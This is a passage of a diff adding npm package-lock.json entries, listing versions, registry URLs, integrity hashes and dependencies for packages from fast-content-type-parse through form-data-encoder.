"node_modules/fast-content-type-parse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/fast-content-type-parse/-/fast-content-type-parse-2.0.1.tgz", + "integrity": "sha512-nGqtvLrj5w0naR6tDPfB4cUmYCqouzyQiz6C5y/LtcDllJdrcc6WaWW6iXyIIOErTa/XRybj28aasdn4LkVk6Q==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/fastify" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/fastify" + } + ], + "license": "MIT" + }, + "node_modules/fast-copy": { + "version": "2.1.7", + "resolved": "https://registry.npmjs.org/fast-copy/-/fast-copy-2.1.7.tgz", + "integrity": "sha512-ozrGwyuCTAy7YgFCua8rmqmytECYk/JYAMXcswOcm0qvGoE3tPb7ivBeIHTOK2DiapBhDZgacIhzhQIKU5TCfA==" + }, + "node_modules/fast-crc32c": { + "version": "2.0.0", + "resolved": "git+ssh://git@github.com/overleaf/node-fast-crc32c.git#aae6b2a4c7a7a159395df9cc6c38dfde702d6f51", + "integrity": "sha512-tv+vSqnHnz1MnUZvtJuTXPH2MjrO91lNUiMmafe6zflExluR8D16jhwtubb/lWk+fTOCv7S7pURWLulsC/sMrg==", + "license": "MIT", + "optionalDependencies": { + "@node-rs/crc32": "^0.1.7" + } + }, + "node_modules/fast-deep-equal": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", + "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" + }, + "node_modules/fast-diff": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/fast-diff/-/fast-diff-1.2.0.tgz", + "integrity": "sha512-xJuoT5+L99XlZ8twedaRf6Ax2TgQVxvgZOYoPKqZufmJib0tL2tegPBOZb1pVNgIhlqDlA0eO0c3wBvQcmzx4w==", + "dev": true + }, + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==" + }, + "node_modules/fast-glob": { + "version": "3.3.3", + "resolved": "https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.3.tgz", + "integrity": "sha512-7MptL8U0cqcFdzIzwOTHoilX9x5BrNqye7Z/LuC7kCMRio1EMSyqRK3BEAUD7sXRq4iT4AzTVuZdhgQ2TCvYLg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@nodelib/fs.stat": "^2.0.2", + "@nodelib/fs.walk": "^1.2.3", + "glob-parent": "^5.1.2", + "merge2": "^1.3.0", + "micromatch": "^4.0.8" + }, + "engines": { + "node": ">=8.6.0" + } + }, + "node_modules/fast-json-parse": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/fast-json-parse/-/fast-json-parse-1.0.3.tgz", + "integrity": "sha512-FRWsaZRWEJ1ESVNbDWmsAlqDk96gPQezzLghafp5J4GUKjbCz3OkAHuZs5TuPEtkbVQERysLp9xv6c24fBm8Aw==", + "dev": true, + "license": "MIT" + }, + "node_modules/fast-json-patch": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/fast-json-patch/-/fast-json-patch-3.1.1.tgz", + "integrity": "sha512-vf6IHUX2SBcA+5/+4883dsIjpBTqmfBjmYiWK1savxQmFk4JfBMLa7ynTYOs1Rolp/T1betJxHiGD3g1Mn8lUQ==" + }, + "node_modules/fast-json-stable-stringify": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", + "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + }, + "node_modules/fast-levenshtein": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", + "integrity": "sha1-PYpcZog6FqMMqGQ+hR8Zuqd5eRc=" + }, + "node_modules/fast-safe-stringify": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/fast-safe-stringify/-/fast-safe-stringify-2.1.1.tgz", + "integrity": "sha512-W+KJc2dmILlPplD/H4K9l9LcAHAfPtP6BY84uVLXQ6Evcz9Lcg33Y2z1IVblT6xdY54PXYVHEv+0Wpq8Io6zkA==", + "dev": true + }, + "node_modules/fast-text-encoding": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/fast-text-encoding/-/fast-text-encoding-1.0.3.tgz", + "integrity": "sha512-dtm4QZH9nZtcDt8qJiOH9fcQd1NAgi+K1O2DbE6GG1PPCK/BWfOH3idCTRQ4ImXRUOyopDEgDEnVEE7Y/2Wrig==" + }, + "node_modules/fast-uri": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/fast-uri/-/fast-uri-3.0.1.tgz", + "integrity": "sha512-MWipKbbYiYI0UC7cl8m/i/IWTqfC8YXsqjzybjddLsFjStroQzsHXkc73JutMvBiXmOvapk+axIl79ig5t55Bw==", + "dev": true + }, + "node_modules/fast-xml-parser": { + "version": "4.2.5", + "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-4.2.5.tgz", + "integrity": "sha512-B9/wizE4WngqQftFPmdaMYlXoJlJOYxGQOanC77fq9k8+Z0v5dDSVh+3glErdIROP//s/jgb7ZuxKfB8nVyo0g==", + "funding": [ + { + "type": "paypal", + "url": "https://paypal.me/naturalintelligence" + }, + { + "type": "github", + "url": "https://github.com/sponsors/NaturalIntelligence" + } + ], + "optional": true, + "peer": true, + "dependencies": { + "strnum": "^1.0.5" + }, + "bin": { + "fxparser": "src/cli/cli.js" + } + }, + "node_modules/fastest-levenshtein": { + "version": "1.0.16", + "resolved": "https://registry.npmjs.org/fastest-levenshtein/-/fastest-levenshtein-1.0.16.tgz", + "integrity": "sha512-eRnCtTTtGZFpQCwhJiUOuxPQWRXVKYDn0b2PeHfXL6/Zi53SLAzAHfVhVWK2AryC/WH05kGfxhFIPvTF0SXQzg==", + "dev": true, + "engines": { + "node": ">= 4.9.1" + } + }, + "node_modules/fastparse": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/fastparse/-/fastparse-1.1.2.tgz", + "integrity": "sha512-483XLLxTVIwWK3QTrMGRqUfUpoOs/0hbQrl2oz4J0pAcm3A3bu84wxTFqGqkJzewCLdME38xJLJAxBABfQT8sQ==", + "dev": true + }, + "node_modules/fastq": { + "version": "1.13.0", + "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.13.0.tgz", + "integrity": "sha512-YpkpUnK8od0o1hmeSc7UUs/eB/vIPWJYjKck2QKIzAf71Vm1AAQ3EbuZB3g2JIy+pg+ERD0vqI79KyZiB2e2Nw==", + "dependencies": { + "reusify": "^1.0.4" + } + }, + "node_modules/faye-websocket": { + "version": "0.11.4", + "resolved": "https://registry.npmjs.org/faye-websocket/-/faye-websocket-0.11.4.tgz", + "integrity": "sha512-CzbClwlXAuiRQAlUyfqPgvPoNKTckTPGfwZV4ZdAhVcP2lh9KUxJg2b5GkE7XbjKQ3YJnQ9z6D9ntLAlB+tP8g==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "websocket-driver": ">=0.5.1" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/fclone": { + "version": "1.0.11", + "resolved": "https://registry.npmjs.org/fclone/-/fclone-1.0.11.tgz", + "integrity": "sha1-EOhdo4v+p/xZk0HClu4ddyZu5kA=", + "dev": true + }, + "node_modules/fd-package-json": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/fd-package-json/-/fd-package-json-1.2.0.tgz", + "integrity": "sha512-45LSPmWf+gC5tdCQMNH4s9Sr00bIkiD9aN7dc5hqkrEw1geRYyDQS1v1oMHAW3ysfxfndqGsrDREHHjNNbKUfA==", + "dev": true, + "license": "MIT", + "dependencies": { + "walk-up-path": "^3.0.1" + } + }, + "node_modules/fd-slicer": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/fd-slicer/-/fd-slicer-1.1.0.tgz", + "integrity": "sha1-JcfInLH5B3+IkbvmHY85Dq4lbx4=", + "dependencies": { + "pend": "~1.2.0" + } + }, + "node_modules/feature-detect-es6": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/feature-detect-es6/-/feature-detect-es6-1.5.0.tgz", + "integrity": "sha512-DzWPIGzTnfp3/KK1d/YPfmgLqeDju9F2DQYBL35VusgSApcA7XGqVtXfR4ETOOFEzdFJ3J7zh0Gkk011TiA4uQ==", + "dependencies": { + "array-back": "^1.0.4" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/feature-detect-es6/node_modules/array-back": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/array-back/-/array-back-1.0.4.tgz", + "integrity": "sha1-ZEun8JX3/898Q7Xw3DnTwfA8Bjs=", + "dependencies": { + "typical": "^2.6.0" + }, + "engines": { + "node": ">=0.12.0" + } + }, + "node_modules/feature-policy": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/feature-policy/-/feature-policy-0.3.0.tgz", + "integrity": "sha512-ZtijOTFN7TzCujt1fnNhfWPFPSHeZkesff9AXZj+UEjYBynWNUIYpC87Ve4wHzyexQsImicLu7WsC2LHq7/xrQ==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/figures": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/figures/-/figures-3.2.0.tgz", + "integrity": "sha512-yaduQFRKLXYOGgEn6AZau90j3ggSOyiqXU0F9JZfeXYhNa+Jk4X+s45A2zg5jns87GAFa34BBm2kXw4XpNcbdg==", + "dev": true, + "dependencies": { + "escape-string-regexp": "^1.0.5" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/figures/node_modules/escape-string-regexp": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", + "integrity": "sha1-G2HAViGQqN/2rjuyzwIAyhMLhtQ=", + "dev": true, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/file-entry-cache": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-6.0.1.tgz", + "integrity": "sha512-7Gps/XWymbLk2QLYK4NzpMOrYjMhdIxXuIvy2QBsLE6ljuodKvdkWs/cpyJJ3CVIVpH0Oi1Hvg1ovbMzLdFBBg==", + "dependencies": { + "flat-cache": "^3.0.4" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + } + }, + "node_modules/file-loader": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/file-loader/-/file-loader-6.2.0.tgz", + "integrity": "sha512-qo3glqyTa61Ytg4u73GultjHGjdRyig3tG6lPtyX/jOEJvHif9uB0/OCI2Kif6ctF3caQTW2G5gym21oAsI4pw==", + "dev": true, + "dependencies": { + "loader-utils": "^2.0.0", + "schema-utils": "^3.0.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^4.0.0 || ^5.0.0" + } + }, + "node_modules/file-selector": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/file-selector/-/file-selector-0.6.0.tgz", + "integrity": "sha512-QlZ5yJC0VxHxQQsQhXvBaC7VRJ2uaxTf+Tfpu4Z/OcVQJVpZO+DGU0rkoVW5ce2SccxugvpBJoMvUs59iILYdw==", + "dependencies": { + "tslib": "^2.4.0" + }, + "engines": { + "node": ">= 12" + } + }, + "node_modules/file-uri-to-path": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/file-uri-to-path/-/file-uri-to-path-1.0.0.tgz", + "integrity": "sha512-0Zt+s3L7Vf1biwWZ29aARiVYLx7iMGnEUl9x33fbB/j3jR81u/O2LbqK+Bm1CDSNDKVtJ/YjwY7TUd5SkeLQLw==" + }, + "node_modules/filelist": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", + "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", + "dependencies": { + "minimatch": "^5.0.1" + } + }, + "node_modules/filelist/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/filelist/node_modules/minimatch": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.0.tgz", + "integrity": "sha512-9TPBGGak4nHfGZsPBohm9AWg6NoT7QTCehS3BIJABslyZbzxfV78QM2Y6+i741OPZIafFAaiiEMh5OyIrJPgtg==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", + "dependencies": { + "to-regex-range": "^5.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/finalhandler": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/finalhandler/-/finalhandler-1.3.1.tgz", + "integrity": "sha512-6BN9trH7bp3qvnrRyzsBz+g3lZxTNZTbVO2EV1CS0WIcDbawYVdYvGflME/9QP0h0pYlCDBCTjYa9nZzMDpyxQ==", + "dependencies": { + "debug": "2.6.9", + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "on-finished": "2.4.1", + "parseurl": "~1.3.3", + "statuses": "2.0.1", + "unpipe": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/finalhandler/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/finalhandler/node_modules/encodeurl": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-2.0.0.tgz", + "integrity": "sha512-Q0n9HRi4m6JuGIV1eFlmvJB7ZEVxu93IrMyiMsGC0lrMJMWzRgx6WGquyfQgZVb31vhGgXnfmPNNXmxnOkRBrg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/finalhandler/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/finalhandler/node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/finalhandler/node_modules/statuses": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.1.tgz", + "integrity": "sha512-RwNA9Z/7PrK06rYLIzFMlaF+l73iwpzsqRIFgbMLbTcLD6cOao82TaWefPXQvB2fOC4AjuYSEndS7N/mTCbkdQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/find-babel-config": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/find-babel-config/-/find-babel-config-2.1.1.tgz", + "integrity": "sha512-5Ji+EAysHGe1OipH7GN4qDjok5Z1uw5KAwDCbicU/4wyTZY7CqOCzcWbG7J5ad9mazq67k89fXlbc1MuIfl9uA==", + "dev": true, + "dependencies": { + "json5": "^2.2.3", + "path-exists": "^4.0.0" + } + }, + "node_modules/find-cache-dir": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/find-cache-dir/-/find-cache-dir-2.1.0.tgz", + "integrity": "sha512-Tq6PixE0w/VMFfCgbONnkiQIVol/JJL7nRMi20fqzA4NRs9AfeqMGeRdPi3wIhYkxjeBaWh2rxwapn5Tu3IqOQ==", + "dev": true, + "dependencies": { + "commondir": "^1.0.1", + "make-dir": "^2.0.0", + "pkg-dir": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/find-cache-dir/node_modules/find-up": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-3.0.0.tgz", + "integrity": "sha512-1yD6RmLI1XBfxugvORwlck6f75tYL+iR0jqwsOrOxMZyGYqUuDhJ0l4AXdO1iX/FTs9cBAMEk1gWSEx1kSbylg==", + "dev": true, + "dependencies": { + "locate-path": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/find-cache-dir/node_modules/locate-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-3.0.0.tgz", + "integrity": "sha512-7AO748wWnIhNqAuaty2ZWHkQHRSNfPVIsPIfwEOWO22AmaoVrWavlOcMR5nzTLNYvp36X220/maaRsrec1G65A==", + "dev": true, + "dependencies": { + "p-locate": "^3.0.0", + "path-exists": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/find-cache-dir/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/find-cache-dir/node_modules/p-locate": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-3.0.0.tgz", + "integrity": "sha512-x+12w/To+4GFfgJhBEpiDcLozRJGegY+Ei7/z0tSLkMmxGZNybVMSfWj9aJn8Z5Fc7dBUNJOOVgPv2H7IwulSQ==", + "dev": true, + "dependencies": { + "p-limit": "^2.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/find-cache-dir/node_modules/path-exists": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-3.0.0.tgz", + "integrity": "sha1-zg6+ql94yxiSXqfYENe1mwEP1RU=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/find-cache-dir/node_modules/pkg-dir": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-3.0.0.tgz", + "integrity": "sha512-/E57AYkoeQ25qkxMj5PBOVgF8Kiu/h7cYS30Z5+R7WaiCCBfLq58ZI/dSeaEKb9WVJV5n/03QwrN3IeWIFllvw==", + "dev": true, + "dependencies": { + "find-up": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/find-up": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-5.0.0.tgz", + "integrity": "sha512-78/PXT1wlLLDgTzDs7sjq9hzz0vXD+zn+7wypEe4fXQxCmdmqfGsEPQxmiCSQI3ajFV91bVSsvNtrJRiW6nGng==", + "dependencies": { + "locate-path": "^6.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/find-yarn-workspace-root": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/find-yarn-workspace-root/-/find-yarn-workspace-root-2.0.0.tgz", + "integrity": "sha512-1IMnbjt4KzsQfnhnzNd8wUEgXZ44IzZaZmnLYx7D5FZlaHt2gW20Cri8Q+E/t5tIj4+epTBub+2Zxu/vNILzqQ==", + "dependencies": { + "micromatch": "^4.0.2" + } + }, + "node_modules/findit2": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/findit2/-/findit2-2.2.3.tgz", + "integrity": "sha512-lg/Moejf4qXovVutL0Lz4IsaPoNYMuxt4PA0nGqFxnJ1CTTGGlEO2wKgoDpwknhvZ8k4Q2F+eesgkLbG2Mxfog==", + "engines": { + "node": ">=0.8.22" + } + }, + "node_modules/flat": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/flat/-/flat-5.0.2.tgz", + "integrity": "sha512-b6suED+5/3rTpUBdG1gupIl8MPFCAMA0QXwmljLhvCUKcUvdE4gWky9zpuGCcXHOsz4J9wPGNWq6OKpmIzz3hQ==", + "dev": true, + "bin": { + "flat": "cli.js" + } + }, + "node_modules/flat-cache": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-3.0.4.tgz", + "integrity": "sha512-dm9s5Pw7Jc0GvMYbshN6zchCA9RgQlzzEZX3vylR9IqFfS8XciblUXOKfW6SiuJ0e13eDYZoZV5wdrev7P3Nwg==", + "dependencies": { + "flatted": "^3.1.0", + "rimraf": "^3.0.2" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + } + }, + "node_modules/flat-cache/node_modules/rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/flatted": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.3.1.tgz", + "integrity": "sha512-X8cqMLLie7KsNUDSdzeN8FYK9rEt4Dt67OsG/DNGnYTSDBG4uFAJFBnUeiV+zCVAvwFy56IjM9sH51jVaEhNxw==" + }, + "node_modules/flow-parser": { + "version": "0.250.0", + "resolved": "https://registry.npmjs.org/flow-parser/-/flow-parser-0.250.0.tgz", + "integrity": "sha512-8mkLh/CotlvqA9vCyQMbhJoPx2upEg9oKxARAayz8zQ58wCdABnTZy6U4xhMHvHvbTUFgZQk4uH2cglOCOel5A==", + "dev": true, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/flowstate": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/flowstate/-/flowstate-0.4.1.tgz", + "integrity": "sha1-tfu4t/wte9xbVL5GyYMJ73NvTsA=", + "dependencies": { + "clone": "^1.0.2", + "uid-safe": "^2.1.0", + "utils-flatten": "^1.0.0" + } + }, + "node_modules/flowstate/node_modules/clone": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/clone/-/clone-1.0.4.tgz", + "integrity": "sha1-2jCcwmPfFZlMaIypAheco8fNfH4=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/follow-redirects": { + "version": "1.15.6", + "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", + "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", + "funding": [ + { + "type": "individual", + "url": "https://github.com/sponsors/RubenVerborgh" + } + ], + "engines": { + "node": ">=4.0" + }, + "peerDependenciesMeta": { + "debug": { + "optional": true + } + } + }, + "node_modules/for-each": { + "version": "0.3.3", + "resolved": "https://registry.npmjs.org/for-each/-/for-each-0.3.3.tgz", + "integrity": "sha512-jqYfLp7mo9vIyQf8ykW2v7A+2N4QjeCeI5+Dz9XraiO1ign81wjiH7Fb9vSOWvQfNtmSa4H2RoQTrrXivdUZmw==", + "dependencies": { + "is-callable": "^1.1.3" + } + }, + "node_modules/for-in": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/for-in/-/for-in-1.0.2.tgz", + "integrity": "sha512-7EwmXrOjyL+ChxMhmG5lnW9MPt1aIeZEwKhQzoBUdTV0N3zuwWDZYVJatDvZ2OyzPUvdIAZDsCetk3coyMfcnQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/foreach": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/foreach/-/foreach-2.0.5.tgz", + "integrity": "sha1-C+4AUBiusmDQo6865ljdATbsG5k=", + "dev": true + }, + "node_modules/foreground-child": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-2.0.0.tgz", + "integrity": "sha512-dCIq9FpEcyQyXKCkyzmlPTFNgrCzPudOe+mhvJU5zAtlBnGVy2yKxtfsxK2tQBThwq225jcvBjpw1Gr40uzZCA==", + "dev": true, + "dependencies": { + "cross-spawn": "^7.0.0", + "signal-exit": "^3.0.2" + }, + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/forever-agent": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", + "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", + "engines": { + "node": "*" + } + }, + "node_modules/fork-ts-checker-webpack-plugin": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/fork-ts-checker-webpack-plugin/-/fork-ts-checker-webpack-plugin-8.0.0.tgz", + "integrity": "sha512-mX3qW3idpueT2klaQXBzrIM/pHw+T0B/V9KHEvNrqijTq9NFnMZU6oreVxDYcf33P8a5cW+67PjodNHthGnNVg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.16.7", + "chalk": "^4.1.2", + "chokidar": "^3.5.3", + "cosmiconfig": "^7.0.1", + "deepmerge": "^4.2.2", + "fs-extra": "^10.0.0", + "memfs": "^3.4.1", + "minimatch": "^3.0.4", + "node-abort-controller": "^3.0.1", + "schema-utils": "^3.1.1", + "semver": "^7.3.5", + "tapable": "^2.2.1" + }, + "engines": { + "node": ">=12.13.0", + "yarn": ">=1.0.0" + }, + "peerDependencies": { + "typescript": ">3.6.0", + "webpack": "^5.11.0" + } + }, + "node_modules/fork-ts-checker-webpack-plugin/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/fork-ts-checker-webpack-plugin/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/fork-ts-checker-webpack-plugin/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/fork-ts-checker-webpack-plugin/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/form-data": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", + "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/form-data-encoder": { + "version": "1.7.2", + "resolved": "https://registry.npmjs.org/form-data-encoder/-/form-data-encoder-1.7.2.tgz", + "integrity": 